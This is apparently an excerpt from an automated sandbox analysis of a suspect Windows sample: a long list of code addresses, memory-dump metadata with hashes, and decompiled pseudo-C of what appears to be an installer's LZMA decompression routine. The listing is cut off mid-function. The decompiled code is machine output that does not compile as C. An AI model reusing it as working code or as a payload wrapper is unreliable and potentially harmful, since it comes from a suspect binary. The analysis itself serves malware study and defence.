                          0x00406303
                          0x00406306
                          0x0040630b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069ee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406333
                          0x00406335
                          0x00406338
                          0x004063a9
                          0x004063ac
                          0x004063af
                          0x004063b6
                          0x004063c0
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x0040633a
                          0x0040633e
                          0x00406341
                          0x00406343
                          0x00406346
                          0x00406349
                          0x0040634b
                          0x0040634e
                          0x00406350
                          0x00406355
                          0x00406358
                          0x0040635b
                          0x0040635f
                          0x00406366
                          0x00406369
                          0x00406370
                          0x00406374
                          0x0040637c
                          0x0040637c
                          0x0040637c
                          0x00406376
                          0x00406376
                          0x00406376
                          0x0040636b
                          0x0040636b
                          0x0040636b
                          0x00406380
                          0x00406383
                          0x004063a1
                          0x004063a3
                          0x00000000
                          0x00406385
                          0x00406385
                          0x00406388
                          0x0040638b
                          0x0040638e
                          0x00406390
                          0x00406390
                          0x00406390
                          0x00406393
                          0x00406396
                          0x00406398
                          0x00406399
                          0x0040639c
                          0x00000000
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040663c
                          0x00406640
                          0x00406663
                          0x00406666
                          0x00406669
                          0x00406673
                          0x00406642
                          0x00406642
                          0x00406645
                          0x00406648
                          0x0040664b
                          0x00406658
                          0x0040665b
                          0x0040665b
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x00000000
                          0x0040667f
                          0x00406683
                          0x00000000
                          0x00000000
                          0x00406689
                          0x0040668d
                          0x00000000
                          0x00000000
                          0x00406693
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x004066a0
                          0x00000000
                          0x00000000
                          0x004066f0
                          0x004066f4
                          0x004066fb
                          0x004066fe
                          0x00406701
                          0x0040670b
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x0040699f
                          0x004066f6
                          0x00000000
                          0x00000000
                          0x00406717
                          0x0040671b
                          0x00406722
                          0x00406725
                          0x00406728
                          0x0040671d
                          0x0040671d
                          0x0040671d
                          0x0040672b
                          0x0040672e
                          0x00406731
                          0x00406731
                          0x00406734
                          0x00406737
                          0x0040673a
                          0x0040673a
                          0x0040673d
                          0x00406744
                          0x00406749
                          0x00000000
                          0x00000000
                          0x004067d7
                          0x004067d7
                          0x004067db
                          0x00406b79
                          0x00000000
                          0x00406b79
                          0x004067e1
                          0x004067e4
                          0x004067e7
                          0x004067eb
                          0x004067ee
                          0x004067f4
                          0x004067f6
                          0x004067f6
                          0x004067f6
                          0x004067f9
                          0x004067fc
                          0x00000000
                          0x00000000
                          0x004063cc
                          0x004063cc
                          0x004063d0
                          0x00406b3d
                          0x00000000
                          0x00406b3d
                          0x004063d6
                          0x004063d9
                          0x004063dc
                          0x004063e0
                          0x004063e3
                          0x004063e9
                          0x004063eb
                          0x004063eb
                          0x004063eb
                          0x004063ee
                          0x004063f1
                          0x004063f1
                          0x004063f4
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x004063fd
                          0x00406403
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406410
                          0x00406413
                          0x00406416
                          0x00406419
                          0x0040641a
                          0x0040641d
                          0x0040641f
                          0x00406425
                          0x00406428
                          0x0040642b
                          0x0040642e
                          0x00406431
                          0x00406434
                          0x00406437
                          0x00406453
                          0x00406456
                          0x00406459
                          0x0040645c
                          0x00406463
                          0x00406467
                          0x00406469
                          0x0040646d
                          0x00406439
                          0x00406439
                          0x0040643d
                          0x00406445
                          0x0040644a
                          0x0040644c
                          0x0040644e
                          0x0040644e
                          0x00406470
                          0x00406477
                          0x0040647a
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406485
                          0x00406485
                          0x00406489
                          0x00406b49
                          0x00000000
                          0x00406b49
                          0x0040648f
                          0x00406492
                          0x00406495
                          0x00406499
                          0x0040649c
                          0x004064a2
                          0x004064a4
                          0x004064a4
                          0x004064a4
                          0x004064a7
                          0x004064aa
                          0x004064aa
                          0x004064aa
                          0x004064b0
                          0x00000000
                          0x00000000
                          0x004064b2
                          0x004064b5
                          0x004064b8
                          0x004064bb
                          0x004064be
                          0x004064c1
                          0x004064c4
                          0x004064c7
                          0x004064ca
                          0x004064cd
                          0x004064d0
                          0x004064e8
                          0x004064eb
                          0x004064ee
                          0x004064f1
                          0x004064f1
                          0x004064f4
                          0x004064f8
                          0x004064fa
                          0x004064d2
                          0x004064d2
                          0x004064da
                          0x004064df
                          0x004064e1
                          0x004064e3
                          0x004064e3
                          0x004064fd
                          0x00406504
                          0x00406507
                          0x00000000
                          0x00406509
                          0x00000000
                          0x00406509
                          0x00406507
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x00000000
                          0x00000000
                          0x00406549
                          0x00406549
                          0x0040654d
                          0x00406b55
                          0x00000000
                          0x00406b55
                          0x00406553
                          0x00406556
                          0x00406559
                          0x0040655d
                          0x00406560
                          0x00406566
                          0x00406568
                          0x00406568
                          0x00406568
                          0x0040656b
                          0x0040656e
                          0x0040656e
                          0x00406574
                          0x00406512
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00406515
                          0x00406576
                          0x00406576
                          0x00406579
                          0x0040657c
                          0x0040657f
                          0x00406582
                          0x00406585
                          0x00406588
                          0x0040658b
                          0x0040658e
                          0x00406591
                          0x00406594
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b5
                          0x004065b8
                          0x004065bc
                          0x004065be
                          0x00406596
                          0x00406596
                          0x0040659e
                          0x004065a3
                          0x004065a5
                          0x004065a7
                          0x004065a7
                          0x004065c1
                          0x004065c8
                          0x004065cb
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x0040685a
                          0x0040685a
                          0x0040685e
                          0x00406b85
                          0x00000000
                          0x00406b85
                          0x00406864
                          0x00406867
                          0x0040686a
                          0x0040686e
                          0x00406871
                          0x00406877
                          0x00406879
                          0x00406879
                          0x00406879
                          0x0040687c
                          0x00000000
                          0x00000000
                          0x0040662a
                          0x0040662a
                          0x0040662d
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x00000000
                          0x00406969
                          0x0040696d
                          0x0040698f
                          0x00406992
                          0x0040699c
                          0x0040699f
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x0040699f
                          0x0040699f
                          0x0040696f
                          0x00406972
                          0x00406976
                          0x00406979
                          0x00406979
                          0x0040697c
                          0x00000000
                          0x00000000
                          0x00406a26
                          0x00406a2a
                          0x00406a48
                          0x00406a48
                          0x00406a48
                          0x00406a4f
                          0x00406a56
                          0x00406a5d
                          0x00406a5d
                          0x00000000
                          0x00406a5d
                          0x00406a2c
                          0x00406a2f
                          0x00406a32
                          0x00406a35
                          0x00406a3c
                          0x00406980
                          0x00406980
                          0x00406983
                          0x00000000
                          0x00000000
                          0x00406b17
                          0x00406b1a
                          0x00406a1b
                          0x00000000
                          0x00000000
                          0x00406751
                          0x00406753
                          0x0040675a
                          0x0040675b
                          0x0040675d
                          0x00406760
                          0x00000000
                          0x00000000
                          0x00406768
                          0x0040676b
                          0x0040676e
                          0x00406770
                          0x00406772
                          0x00406772
                          0x00406773
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x0040678e
                          0x00000000
                          0x00000000
                          0x00406a64
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00000000
                          0x00000000
                          0x00406a73
                          0x00406a73
                          0x00406a77
                          0x00406baf
                          0x00000000
                          0x00406baf
                          0x00406a7d
                          0x00406a80
                          0x00406a83
                          0x00406a87
                          0x00406a8a
                          0x00406a90
                          0x00406a92
                          0x00406a92
                          0x00406a92
                          0x00406a95
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a9b
                          0x00406a9b
                          0x00406a9f
                          0x00406aff
                          0x00406b02
                          0x00406b07
                          0x00406b08
                          0x00406b0a
                          0x00406b0c
                          0x00406b0f
                          0x00406a1b
                          0x00406a1b
                          0x00000000
                          0x00406a21
                          0x00406a1b
                          0x00406aa1
                          0x00406aa7
                          0x00406aaa
                          0x00406aad
                          0x00406ab0
                          0x00406ab3
                          0x00406ab6
                          0x00406ab9
                          0x00406abc
                          0x00406abf
                          0x00406ac2
                          0x00406adb
                          0x00406ade
                          0x00406ae1
                          0x00406ae4
                          0x00406ae8
                          0x00406aea
                          0x00406aea
                          0x00406aeb
                          0x00406aee
                          0x00406ac4
                          0x00406ac4
                          0x00406acc
                          0x00406ad1
                          0x00406ad3
                          0x00406ad6
                          0x00406ad6
                          0x00406af1
                          0x00406af8
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406796
                          0x00406799
                          0x004067cf
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x00406902
                          0x00406902
                          0x00406905
                          0x00406907
                          0x00406b91
                          0x00000000
                          0x00406b91
                          0x0040690d
                          0x00406910
                          0x00000000
                          0x00000000
                          0x00406916
                          0x0040691a
                          0x0040691d
                          0x0040691d
                          0x0040691d
                          0x00000000
                          0x0040691d
                          0x0040679b
                          0x0040679d
                          0x0040679f
                          0x004067a1
                          0x004067a4
                          0x004067a5
                          0x004067a7
                          0x004067a9
                          0x004067ac
                          0x004067af
                          0x004067c5
                          0x004067ca
                          0x00406802
                          0x00406802
                          0x00406806
                          0x00406832
                          0x00406834
                          0x0040683b
                          0x0040683e
                          0x00406841
                          0x00406841
                          0x00406846
                          0x00406846
                          0x00406848
                          0x0040684b
                          0x00406852
                          0x00406855
                          0x00406882
                          0x00406882
                          0x00406885
                          0x00406888
                          0x004068fc
                          0x004068fc
                          0x004068fc
                          0x00000000
                          0x004068fc
                          0x0040688a
                          0x00406890
                          0x00406893
                          0x00406896
                          0x00406899
                          0x0040689c
                          0x0040689f
                          0x004068a2
                          0x004068a5
                          0x004068a8
                          0x004068ab
                          0x004068c4
                          0x004068c6
                          0x004068c9
                          0x004068ca
                          0x004068cd
                          0x004068cf
                          0x004068d2
                          0x004068d4
                          0x004068d6
                          0x004068d9
                          0x004068db
                          0x004068de
                          0x004068e2
                          0x004068e4
                          0x004068e4
                          0x004068e5
                          0x004068e8
                          0x004068eb
                          0x004068ad
                          0x004068ad
                          0x004068b5
                          0x004068ba
                          0x004068bc
                          0x004068bf
                          0x004068bf
                          0x004068ee
                          0x004068f5
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x00000000
                          0x004068f7
                          0x00000000
                          0x004068f7
                          0x004068f5
                          0x00406808
                          0x0040680b
                          0x0040680d
                          0x00406810
                          0x00406813
                          0x00406816
                          0x00406818
                          0x0040681b
                          0x0040681e
                          0x0040681e
                          0x00406821
                          0x00406821
                          0x00406824
                          0x0040682b
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x00000000
                          0x0040682d
                          0x00000000
                          0x0040682d
                          0x0040682b
                          0x004067b1
                          0x004067b4
                          0x004067b6
                          0x004067b9
                          0x00000000
                          0x00000000
                          0x00406518
                          0x00406518
                          0x0040651c
                          0x00406b61
                          0x00000000
                          0x00406b61
                          0x00406522
                          0x00406525
                          0x00406528
                          0x0040652b
                          0x0040652e
                          0x00406531
                          0x00406534
                          0x00406536
                          0x00406539
                          0x0040653c
                          0x0040653f
                          0x00406541
                          0x00406541
                          0x00406541
                          0x00000000
                          0x00000000
                          0x004066a3
                          0x004066a3
                          0x004066a7
                          0x00406b6d
                          0x00000000
                          0x00406b6d
                          0x004066ad
                          0x004066b0
                          0x004066b3
                          0x004066b6
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066be
                          0x004066c1
                          0x004066c4
                          0x004066c7
                          0x004066ca
                          0x004066cb
                          0x004066cd
                          0x004066cd
                          0x004066cd
                          0x004066d0
                          0x004066d3
                          0x004066d6
                          0x004066d9
                          0x004066d9
                          0x004066d9
                          0x004066dc
                          0x004066de
                          0x004066de
                          0x00000000
                          0x00000000
                          0x00406920
                          0x00406920
                          0x00406920
                          0x00406924
                          0x00000000
                          0x00000000
                          0x0040692a
                          0x0040692d
                          0x00406930
                          0x00406933
                          0x00406935
                          0x00406935
                          0x00406935
                          0x00406938
                          0x0040693b
                          0x0040693e
                          0x00406941
                          0x00406944
                          0x00406947
                          0x00406948
                          0x0040694a
                          0x0040694a
                          0x0040694a
                          0x0040694d
                          0x00406950
                          0x00406953
                          0x00406956
                          0x00406959
                          0x0040695d
                          0x0040695f
                          0x00406962
                          0x00000000
                          0x00406964
                          0x004066e1
                          0x004066e1
                          0x00000000
                          0x004066e1
                          0x00406962
                          0x00406b97
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00406bce
                          0x00406bce
                          0x00000000
                          0x00406bce
                          0x00406a1b
                          0x004069a2
                          0x0040699f
                          0x00000000
                          0x004065d6

                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                          • Instruction ID: 1046eeffc13e12efe39df9970ac10e2b765b46b26c22898380a8ab994a27db31
                          • Opcode Fuzzy Hash: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                          • Instruction Fuzzy Hash: 307124B1D00228CBDF24CF98C8447ADBBF1FB44305F15816AD856BB281D778AA96DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004066F0 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E004066F0() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
